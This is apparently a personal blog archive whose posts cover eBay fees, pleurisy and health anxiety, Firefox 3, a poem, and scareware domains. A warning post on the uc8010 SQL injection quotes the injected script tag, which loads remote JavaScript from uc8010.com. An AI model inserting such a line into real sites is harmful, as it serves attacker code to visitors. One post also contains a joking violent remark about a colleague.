dear ebay, i might be lazy, but i ain’t stupid. how ebay’s less than transparent fee system is designed to hide the true cost of using their service

ebay. oh ebay. once one of the mightiest dotcoms of them all. now, just a stupid company trying to fleece the punters.

ebay shafted everyone back in January with their new fee structure 1,2,3. But that’s old news.

Like it or not, ebay are providing a service which you are under no obligation to use and they are free to charge what the hell they like, if you want to use it.

That said, here’s my beef.

Fees = L(x) + S(y) + P(y+z)

I recently sold an item on ebay for £35. Yippee.

However, here is the bill:

Listing fees        0.88
Selling fees        2.88
PayPal fees         1.58
                   --------
                    5.34
                   --------

£5.34 commission on a sale of £35, that’s pretty steep at around 15%. But, I don’t really have a problem with that per se.

The problem is really the way that is it done.

The total fee of £5.34 is charged quite sneakily:

  • firstly, it is split into three small fees, so psychologically it doesn’t seem that bad
    total fees = listing fees + selling fees + paypal fees* .        

    *ebay OWN paypal

     

  • The final fee is NEVER mentioned in any correspondence. After you have sold an item you get an email saying “You’ve sold your item on eBay”, but there is no mention of the fees that you now owe them
     
  • Even within the newly redesigned “my ebay” they are not AT ALL upfront about selling fees and how much you have paid to them. This information – should you decide you want to know what you have paid them – is hidden away deep inside your account details (“my account -> my fees -> view recent fees”).

Transparent? No. Do they really think that no one notices these things?

Just be up-front

In the “selling totals widget” of your “my ebay” page, clearly intended to show you how much money you have made, you see:

but really, this should include how much you are paying in fees, the “final selling value” figure itself is systematically inaccurate, with a error margin of upto around 25%. It is an inflated value, which makes you think that you are making more money that you are. (hmmm, i wonder if that’s important to ebay?)

Take a minute and compare that with what happens before you sell something on amazon:

practise what you preach

But the thing that really made me laugh was this.

Firstly ebay don’t (cannot?) charge you fees on postage and packaging, i.e., if you sell an item for £10 and charge £20 P&P they only charge you fees on the £10 selling fee. ebay don’t want to allow this because anyone with half a brain would charge 1p for the item and put the true price in P&P thus saving themselves paying ebay commission fees (and costing ebay most of their revenue).

So, ebay has a policy against charging excessive shipping fees. The thing that made me laugh was this section, encouraging titled “Why does eBay have this policy?” which is obviously a lie and is really about them protecting their revenue stream (which is ok, but why the lie?).

This policy reduces the potential for confusion among bidders about the full cost of an item. Listings that include excessive P&P fees lead to a poor buying experience and unlevel the playing field by putting sellers who charge reasonable P&P charges at a disadvantage. These listings undermine the trust and legitimacy of eBay’s marketplace.

oh really.

Hypochondria is your enemy

I’m well into my 4th month of my fun with pleurisy. I’ve had several chest x-rays now (all clear) and done skin prick tests, lung function tests and been seen three times by cardiothoracic specialists. The experts think I’m okay. I’m on some drugs (the first proper treatment) sodium diclofenac – an anti-inflammatory drug. The professor says that will fix me, and if it doesn’t he’ll run a CT scan. He’s pretty sure I’m okay. I’m back to see him in 8 weeks. 

Great.  So maybe I’m okay now. It still hurts, but very very very slowly it improves. Very gradually, almost immeasurably, but (I think) there is improvement.

But I’ll tell you what. After six months of feeling crap and being ill and being in pain, I’ve turned into a nervous wreck. Every sensation in my body is now analysed and re-analysed. A sore throat, a funny pain, a twinge, everything is treated with the utmost suspicion and fear. I’ve felt lumps in my throat. I’ve had headaches, and chest pains on the left (my pleurisy is on the right), I think just about anything it is a symptom of some new saga. 

The smallest sensation brings my mind racing and running through ridiculous and far-fetched scenarios. It’s got so bad that I’ve had to ban myself from looking at House. I’ve even suspected lupus.  

I wonder, once the pain is gone, (perhaps now, I can see the end of that tunnel) how long will it take for me to return to my “normal” anxiety levels.

The whole problem with anxiety is that is forms a vicious cycle of making you feel physically rubbish and that feeling makes you feel more anxious. It’s a bloody annoying thing. It’s well documented and I’m well aware of the process, but is that enough to stop it? 

My boys provide welcome relief.  “Daddy, I happy” D tells me every couple hours or so. He doesn’t know, may never know, what good medicine his words are.  The boys are both asleep now. I think I’ll go in and touch their little hands. It stills my heart like CBT never could.

3 months and counting. The joys of pleurisy.

My fun with pleurisy is not yet over it would seem. I was recovering quite happily and I think I may have over-exerted myself over the last week or so, and the pains feel as bad as they did 6 weeks ago.

It is really really boring. I’m not suffering from the acute form anymore (ie “not the super painful I’m being stabbed in the chest everytime i breathe” form), it is really just annoying, it can be quite painful if I do the wrong thing (move suddenly, twisting etc) but more or less it feels like a stitch. There is some tightness in my chest, and I’m not sure if that is anxiety or my lungs.

I found this Pleurisy Forum, which looks useful, so may hang out there for the next 3 years or so. Phah.

It’s almost fun there because you hear of cases so much worse than your own, that you start thinking maybe you are ok.

For example:

My mother has had pleurisy for 16 weeks now. Along with the severe pain she also feels very ill and I am becoming increasingly concerned. She has had about 10 lots of antibiotics and a chest xray.

(from http://experience.patient.co.uk/discussion.php?t=20516)

Admittedly I’m going on to three months now, which is almost 16 weeks, but at least I haven’t had that many anti-biotics.

I’ld also thought I’ld some of these alternative treatments. Anyone who knows me, knows that I am seriously against hippy shit like this, but doing something has got to be better than doing nothing. Maybe.

Firefox 3 sucks

It seems to be another crap browser from Mozilla, anything after 1.4 seems to have sucked to me. To add a little perspective, it is not the most crap thing ever, not in the same league with Window ME for instance, however, it does have issues which make suckage.

Why does it suck:

  1. It crashes alot
  2. It seems to have real trouble loading flash content (some sites work, some don’t).  You cannot break Flash and expect someone to use your browser.
  3. It’s a memory guzzling pig

I really don’t get what it brings to the party that IE7 doesn’t already (now) have.

I’m not looking to start a flame war, but I don’t care about Linux and Unix users, they are stuck with Firefox and it is half decent; and when compared to the other browsers non-windoze users have on offer, it must look pretty sweet. But seriously, for Windoze users, compared to IE7 it offers no advantages whatsoever.

It’s a shame because a long time ago it was pretty sweet, and was without a doubt, a better browser than IE5.x and IE6. But since IE7, I really don’t think they can make that claim anymore.

The Web Developer toolbar is the #1 reason I still have it installed on my machine.

I’m not alone, I found another blog who reports about the suckage, he has spent more time on this and has articulated it much better than I could. This one too. Oh have them all.

Much ado about nothing. No, really.

Before I give myself and ulcer, I decided to stop getting hyper about (seemingly) unimportant things.

Problem: There is never anything good on TV.

Synopsis: That’s a fact, and that is probably the #1 reason why I don’t watch as much TV as I’ld like to. Given half a chance, I’ld happily watch Judge Judy and Jerry Springer for hours on end, though I’ld rather be watching Justice League cartoons, or Star Trek re-runs. Of course a lesser blogger would turn this idea into a 14,000 word essay on the demise of western civilisation. Or maybe global warming. But I got a better idea.

Solution: Don’t rely on TV.


Problem: You can become a project manager

Synopsis: this is an affront to intelligent people everywhere. i’m not saying that one doesn’t need to plan and prepare. i’m just saying that if you call it project management, then you are a loser. my boss recently employed someone because they “practise project management principles” and told me I could get some tips from him.

It took every ounce of my rather feeble will power not to go to my local hardware store, and return with a garden spade and smack every last ounce of life from her body.

I digress.

Solution: keep a garden spade in the office.

no one ever taught me how
to watch a television
like a baby i knew my candy
no one ever caught me
when i learned to ride a bicycle
and like the pavement embraced my skin
no one ever warned me
about that television
now i’m brain-dead at twenty seven
no one ever mended my
lumps and bruises
and now it’s hard to breathe
with a broken nose

wheat in no one ever told me

uc8010 is an SQL injection attack

02 January 2008
original post: a plea for help

I cannot find any information about this anywhere, but it happened to me and at least 76,800 others. Information is thin on the ground. If you know more please post it here.

As far as I can tell, the attack inserts <script src=http://?.uc8010.com/0.js></script> into all varchar and text fields in your SQL database.

For lazy people like me, it is proving to be a nightmare! I have traditionally been very relaxed about this kind of business, I guess I must be more careful from now on.

07 January 2008
update on uc8010(dot)com

The exploit has been exposed and described (see the comments below; very, very informative, or go straight to the post-mortem). Below you can find out HOW they did it and WHAT it did. There is no magic fix, you will most likely have to restore your data from a backup, and to prevent further attacks you should escape all querystring variables coming into your database.
Thanks very much to the guys who posted their findings here! Much appreciated.

The attack *is* malicious, and the potential payload is described here http://websmithrob.wordpress.com/ (or this http://isc.sans.org/diary.html?date=2008-01-04).

Also watch out for ucmal.com (122.224.146.246) which appears to be up to similiar tricks.

When is a trojan not a trojan: asecurityservice.com

A non-technical friend of mine recently phoned me up to say he had been infected by a virus.  His home page was hi-jacked and he was pretty worried. The infection was proudly proclaimed to be by asecurityservice.com.  According to several sources [of dubious accuracy]  this is very serious.

asecurityservice.com is dangerous toolbar and comes from very dangerous trojan zlob. It hijack your homepage and displays fake warning message to download the another fake spyware applications… If your computer is infected by asecurityservice.com.com hijacker then it is very dangerous for your computer.

from http://www.pcontech.com/

Note how many times they say dangerous. Note how poor the English is. Note how childishly they warn you of the impending doom. Ooooh this must be bad. I want my {mommy | blanket | cigarettes | pillow} (delete as appropriate)

What are the symptoms?

User’s homepage is changed to asecurityservice.com.com or to other unfamiliar websites. Warning messages such as “Virus Alert”, “Your Computer is Infected”, “Security Alert” Trojan-Spy.win32@mx or Spyware.Cyberlog-X infections are displayed.

You even get a warning that something has happened.

The art of deception: dead?

Well that’s all very interesting, but if I were seriously writing a trojan, would I shout so loudly that I had invaded your machine? (I saw Troy, and I don’t remember the Spartans (holding megaphones) riding the wooden horse into Troy , shouting YOUR DEFENSES HAVE BEEN BREACHED). In fact why bother with the wooden horse in the first place?Morons.

No. More likely this is what I think should be called “asshole-ware”. Why would someone announce that you were ill, could it be so that they could sell you medicine?

Your machine probably is infected, it may even be a real trojan, but the real catch, is they get you to pay $25 to remove the infection. Its a real real dumb idea, but it probably works.

A real trojan is about stealth, it doesn’t announce that it is dangerous.

It’s extremely funny, because they warn you of:

Very High Risk   –  Extremely dangerous Spyware. asecurityservice.com Uses stealth installation, randomly named entries and has the capability to self update or Restore after incomplete removal. Very hard to remove manually. Removing by free software or Re-Name the Dll file of asecurityservice.com cannot decrease the Privacy Risk, because it uses stealth installation method

I like anything which uses stealth and then warns me that it is using steatlth. Is the art of deception truly dead? Was the Cold War all for nothing? Fuckwits.

We have a cure

You can use http://www.lavasoftusa.com to clean your machine. Its free. Its safe. Its well-known. This is a reputable product, and you can download it from http://www.downloads.com. A safe place to get stuff like this.

If you gonna lie, make it big

Lies:

The key to note is that the answer is always the same, and specific recommendation the some no-brand spyware tool. Surprising that they never suggest McAfee or Symantec etc.

Appendix of delusion

This site is probably linked to the idiot mastermind idiot of this scam: http://www.pcontech.com/ where they list their other scams.

 Latest Hijackers List  More lies:

  • besecuredtoday.com
  • Asecurityservice.com
  • asafecenter.com
  • awebsecurity.com
  • thesafetynotes.com
  • asecureinfo.com
  • topiesecurity.com
  • asafebrowser.com
  • iesafetylist.com
  • protectstand.com

Old Hijackers List Older lies:

  • assuredguard.com
  • securityiepage.com
  • secureuptodate.com
  • asecurityupdate.com
  • asafehomepage.com
  • aprotectservice.com
  • asafetywarning.com
  • asecurityview.com
  • protectpage.com
  • asafetylist.com
  • asafetyproject.com
  • asafetynotice.com
  • asecuritypaper.com